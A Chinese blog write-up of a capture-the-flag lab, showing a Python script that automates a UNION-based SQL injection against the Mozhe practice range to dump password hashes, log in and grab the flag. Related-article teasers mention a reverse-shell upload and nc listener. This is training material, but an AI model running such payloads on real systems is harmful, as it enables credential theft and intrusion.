【用python自动注入“sql手工注入靶场”】

最新推荐文章于 2024-06-13 00:01:59 发布
最新推荐文章于 2024-06-13 00:01:59 发布
阅读量566 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/110793582
版权

思路

先对靶场进行研究
在这里插入图片描述

获取ip和端口号

发现了开启靶场后,会返回一个ip地址+端口号:
在这里插入图片描述
观察HTML源码后,利用python正则获取每次开启靶场的端口号:
在这里插入图片描述
首先要在请求头里添加已登录的cookie:
【利用“Cookie-Editor+python脚本”将cookie生成key=value;key=value的形式】

url = "https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe"
headers = [
        ("User-Agent",
         "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"),
        ('Cookie', cookie)
    ]
req = urllib.request.build_opener()
    req.addheaders = headers
    data = req.open(url).read().decode('utf-8')

获得html源码后再利用正则获取ip地址+端口号:

def get_ip_and_port(data):
    print('正在获取ip与端口...')
    ip_pat = re.compile(r'<em>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</em>')
    port_pat = re.compile(r'<em>(\d{5})</em>')
    ip = ip_pat.search(data).group(1)
    port = port_pat.search(data).group(1)
    print(ip + ':' + port)
    return ip + ':' + port

注入获取登录密码md5值

访问ip+端口号后是一个登录界面:
在这里插入图片描述
存在注入的界面在登录框下方的通知里:
在这里插入图片描述
经过手工测试,登录名都为:mozhe,获取密码的注入payload为:

?id=-1%20union%20select%201,2,group_concat(password),4%20from%20mozhe_Discuz_StormGroup.StormGroup_member

注入后会获得两个md5密文,经测试,第二个才是随机的md5密码:
在这里插入图片描述
那么获取密码的方法就为:

def get_md5():
    payload = r'http://' + ip_and_port + r'/new_list.php?id=-1%20union%20select%201,2,group_concat(password),4%20from%20mozhe_Discuz_StormGroup.StormGroup_member'
    print(f'正在利用payload:\n{payload}\n注入获取md5值...')
    data = urllib.request.urlopen(payload).read().decode('utf-8')
    md5_pat = re.compile(r',([a-z0-9]{32})')
    print('获取md5成功!\n', md5_pat.search(data).group(1))
    return md5_pat.search(data).group(1)

登录后台获取flag

获取到md5密文后到解密网站解密,拿回来的明文密码登录登录。默认账号就是mozhe。登录后会获得一个以mozhe开头的32位flag,将这个flag上传就解题成功了。
在这里插入图片描述
在这里插入图片描述
在首页提交key即可:
在这里插入图片描述

获得明文密码后,自动登录。利用正则获取flag方法:

def get_flag():
    try:
        passwd = input()
        url = r'http://' + ip_and_port + '/login.php'
        form = {'name': 'mozhe', 'password': passwd}
        data = requests.post(url=url, data=form).text
        flag_pat = re.compile('(mozhe[a-z0-9]{27})')
        key = flag_pat.search(data).group(1)
        print('获得flag成功!')
        print(key)
        return key
    except Exception as e:
        print('获得flag失败!')
        print(e)

源码方法基本已给出,组装一下就可以用了。

简单测试

由于能力有限,没有写出自动获取md5值解密的方法,所以速度卡在了需要手动md5解密。

创个新号简单测试一下~
在这里插入图片描述
手动解密md5时再快点(其实还可以更快),再创个新号测试一下~
第一了,那就到此为止吧。
在这里插入图片描述

12.15 更:

鉴于其登录密码都为6位数md5值,可以采取本地暴力破解。具体方法参考:
https://blog.csdn.net/qq_44874645/article/details/111205561

再次尝试:
在这里插入图片描述

AA8j
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python条件结构」靶场射击考试
夜晚回家
07-14 200
编写一个控制台应用程序,通过if…elif条件结构实现在靶场进行射击考试成绩的判断,具体的考核标准如下: 打靶10环成绩优秀;打靶8~9环成绩良好;打靶5~7环成绩合格;打靶0~4环需要重考。 打靶的环数使用随机数产生,即随机产生0~10的整数表示打靶的环数。...
PyCodeInjectionShell - 自动Python代码注入工具
我的学习笔记
02-28 1202
参考:https://github.com/sethsec/PyCodeInjectionPyCodeInjection项目包含两个主要组件:PyCodeInjectionShell - 一种利用基于Web应用程序的Python代码注入的工具PyCodeInjectionApp - 一种易受Python代码注入攻击的Web应用程序安装:git clone...
零基础打靶—Glasgow Smile靶场
qq_61861243的博客
06-06 1309
10、将复制的shell脚本上传到/index.php中(全部替换),在第48行附近找到ip和port,将ip更改为攻击机的IP,端口可以自己设定(设定合理即可,这里为1234)之后在kali中打开监听 nc-1nvp 1234。12、去/var/www/目录查看有html和joomla2文件,查看joomla2文件,发现了configuration.php,查看该文件,发现了一个数据的用户名和密码。3、我访问Joomla站点,发现只有一个帖子,其中有电影“小丑”的两个场景对话,还发现一个登录窗口。
python-di:python的全自动依赖项注入
03-06
python-di python 3.7、3.8、3.9的全自动依赖注入使用(不仅是)类型注释(类型提示)。 对应于干净的架构模式,是DDD /六角架构样式中创建的业务应用程序的理想选择。 没有外部依赖项-仅使用标准库。 主要特点: 基于类型提示/类型注释的自动类型匹配-无需手动配置,开箱即用 可配置的对象聚合注入SomeClass可以加入SomeClass对象并注入标注为Collection[SomeClass] 不损害现有代码库-无需修饰符,现有代码库中无需额外的元数据即可构建应用程序 没有单例或全局DI进程状态-应用程序或任何应用程序组件可以根据需要独立实例化多次 DI过程的透明度-构建静态依赖关系图和注入计划,针对错误情况提供有益的异常信息(例如循环依赖关系或缺少元素) 帮助 快来了... 一个例子 位于mod_simple.py应用程序域: from typing i
靶场
qq_43627239的博客
06-13 1586
SSI注入 SSI(server side inject)的出现是为了赋予html静态页面动态的效果,通过SSI来执行系统命令,并返回对应的结果。 如果在网站目录中发现了 .stm, .shtm .shtml,并且网站对于SSL的输入没有做到严格过滤,很有可能被SSI注入攻击。 过程: 打开我们的kali攻击机和靶场 老套路终端ifconfig查看攻击机ip nmap扫描出靶场ip ...
python注入攻击_Python应用04_自动sql注入攻击
weixin_35146639的博客
02-21 342
from prettytable import PrettyTableimport HackRequestsfrom bs4 import BeautifulSoupimport reimport time#1.判断能否注入以及注入类型Type=0dic1 = ['?id=1', '?id=1\'+--+', '?id=1\')+--+1', '?id=1\'))+--+', '?id=1"+--...
使用Python防止SQL注入攻击的实现示例
09-16
### 使用Python防止SQL注入攻击的实现示例 #### 文章背景与重要性 随着网络技术的发展,Web应用程序的安全性越来越受到人们的重视。开放式Web应用程序安全项目(OWASP)每几年都会发布一次关于Web应用程序最常见...
Python中防止sql注入的方法详解
09-21
对于使用Python进行Web开发的人员来说,了解如何有效地预防SQL注入是非常重要的。本文将详细介绍几种在Python开发中防止SQL注入的方法,并通过实例来展示这些技术的应用。 #### SQL注入的原因与危害 SQL注入通常...
Python实现自动sql注入
07-26
我不鼓励或支持任何违反法律和道德的行为,包括自动SQL注入SQL注入是一种安全漏洞,可能导致系统被攻击者利用并获取敏感信息。 作为开发者或用户,我们应该采取措施来防止SQL注入攻击,而不是去实现自动化工具来...
基于Python实现的自动SQL注入检测工具
最新发布
07-11
【作品名称】:基于Python实现的自动SQL注入检测工具 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】:####使用说明 ...
Python自动sql注入:布尔盲注
qq_46145027的博客
04-22 3590
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场sqli-labs。
python注入攻击_python番外篇--sql注入
weixin_35141284的博客
01-29 350
一、sql注入概念介绍所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。二、Python中防止sql注入的方法i...
基于pythonSQL注入攻击检测工具设计与实现(开题报告)
毕业作品网站
04-07 905
SQL注入是一种常见的网络攻击技术,其原理主要是通过在应用程序的输入参数中注入恶意的SQL代码,从而绕过应用程序的安全机制,能够对数据库进行非法的操作或窃取敏感信息。SQL注入攻击的原理是利用应用程序对用户输入数据的处理不当。SQLMap 的原理基于探测和利用Web应用中存在的SQL注入漏洞,能够对数据库进行广泛的操作,包括获取数据库名称、表、列、数据以及运行特定的数据库操作代码。重要的是要强调的是,SQLMap应该仅用于法律许可的渗透测试活动和安全评估中,对未经授权的系统进行扫描或攻击是非法的。
python脚本自动化盲注_三、基于报错型注入sql盲注的自动化实现
weixin_39997443的博客
01-15 316
通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的。这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动注入,坐等信息爆出的感觉–>我就静静看着不说话_以下两个python脚本仅适用于SQLI-LABS,在其他平台使用还需要做少许改动~~~*** SQLI-LABS 是一个专业的SQL注入练习平台**基...
Pilot-Web:一款基于PythonFlask框架开发的前后端分离式渗透测试&漏洞挖掘Web靶场,内置WP与知识库的集成式教学靶场
seoppg的博客
06-13 1123
Pilot领航员靶场是基于Web安全的漏洞测试靶场,一个专为教师和学生设计的WEB安全教学实践平台,旨在帮助网安初学者快速熟悉和掌握目前常见漏洞的原理和实际利用方法,以及帮助安全实践教师在课堂环境中演示教学如何进行WEB漏洞测试。Pilot靶场由 Flask + Mysql + AdminLTE 框架编写而成,模拟每类漏洞根据不同的情况又分别设计了不同的子类,全部共有30个漏洞环境。同时,Pilot在每个环境的右上角嵌入了四个模块作为辅助工具,希望对您的学习或教学有所帮助。
python高级练习题:挑战乐趣#14:打靶游戏【难度:3级】--景越Python编程实例训练营,不同难度Python习题,适合自学Python的新手进阶
景越Python编程实例训练营
10-27 532
python高级练习题:挑战乐趣#14:打靶游戏【难度:3级】: 任务 在你最喜欢的游戏,你必须拍摄一靶,利用水炮来获得积分.每个目标可以值得不同的分额.    你肯定打每当你尝试打目标.虽然因为目标是只有一秒钟(一次一个),可见,它需要你一个完整的第二次拍摄后重新加载你的水郡(你开始游戏已经加载)不能连续命中目标. 给定一个数组vals与每个目标的点值的顺序,确定你可以赢得点...
python脚本跑SQLlib靶场_Python 是我用过最糟糕的语言之一
weixin_39636691的博客
11-14 159
搜了下知乎居然没有一个吐槽Python的,吐槽js的倒挺多。作为近年在AI加持下大热的语言,我来斗胆吐槽一下,看看是否有人感同身受,也欢迎资深Python程序员反驳start:没有Let等局部变量声明(Scala有block,Haskell,Idris,Ocaml,es6的Let, js的 var),你无法可靠地在局部引入一个变量,一不小心就把全局变量改了。我觉得这个是最无法忍受的。所有绑定都是可...
python脚本跑SQLlib靶场_网站自动化脚本的实操
weixin_39563132的博客
10-25 100
流量生意永不过时,无论哪个渠道,获客成本都是越来越高。我最熟悉的流量获取就是百度搜索,所以近期正在实现关于网站的一些自动化脚本。一、关键词拓展免费的主要来源于关键词规划师、百度相关推荐词。关键词规划师可以直接导出Excel,百度相关词需要跑脚本。付费的主要是用5118挖掘长尾关键词。二、关键词筛选主要是筛选出有需求、低竞争度的关键词。有需求比较好理解:有搜索量或者有指数,把没指数的关键词...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值